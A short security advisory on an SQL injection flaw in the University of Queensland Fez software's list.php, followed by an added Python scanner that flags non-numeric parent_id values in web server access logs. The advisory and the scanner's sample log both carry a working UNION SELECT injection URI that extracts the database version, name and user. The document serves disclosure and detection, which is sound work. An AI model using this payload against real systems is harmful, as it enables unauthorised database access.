University of Queensland Fez 'list.php' SQL Injection Vulnerability

Attackers can exploit this issue via a browser.

The following example URI is available:

http://www.example.com/list.php?browse=subject&parent_id=1 UNION SELECT 1,concat_ws(0x3a,version(),database(),user())/*
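
For defenders reviewing web server logs, the following added example (not part of the original advisory and not Fez code) flags requests to list.php whose decoded parent_id value is anything other than a plain integer, which is the shape of the URI above. It assumes parent_id is meant to hold a numeric identifier and that logs are in combined access-log format; the log lines and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: parent_id should only ever carry a plain integer identifier.
NUMERIC = re.compile(r"\d+")
# Request line inside a combined-format access log entry.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (documentation IP range, made-up timestamps).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2010:10:00:00 +0000] '
    '"GET /list.php?browse=subject&parent_id=1 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [01/Jan/2010:10:00:07 +0000] '
    '"GET /list.php?browse=subject&parent_id=1%20UNION%20SELECT%201,'
    'concat_ws(0x3a,version(),database(),user())/* HTTP/1.1" 200 734',
    '192.0.2.10 - - [01/Jan/2010:10:00:09 +0000] '
    '"GET /view.php?pid=12 HTTP/1.1" 200 2048',
]


def suspicious_parent_id(log_line):
    """Return the decoded parent_id if it is not a plain integer, else None."""
    match = REQUEST.search(log_line)
    if not match:
        return None
    url = urlsplit(match.group(1))
    if not url.path.endswith("/list.php"):
        return None
    # parse_qs percent-decodes values, so %20-encoded payloads are normalised.
    params = parse_qs(url.query, keep_blank_values=True)
    for value in params.get("parent_id", []):
        if not NUMERIC.fullmatch(value):
            return value
    return None


def flag_lines(lines):
    """Return (line_number, decoded_value) for every flagged log line."""
    hits = []
    for number, line in enumerate(lines, 1):
        value = suspicious_parent_id(line)
        if value is not None:
            hits.append((number, value))
    return hits


if __name__ == "__main__":
    for number, value in flag_lines(SAMPLE_LOG):
        print(f"line {number}: non-numeric parent_id -> {value!r}")
```

The same integer-only rule, applied server-side before the value reaches the database query, rejects the request outright instead of only detecting it afterwards.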


 

Copyright 2010, SecurityFocus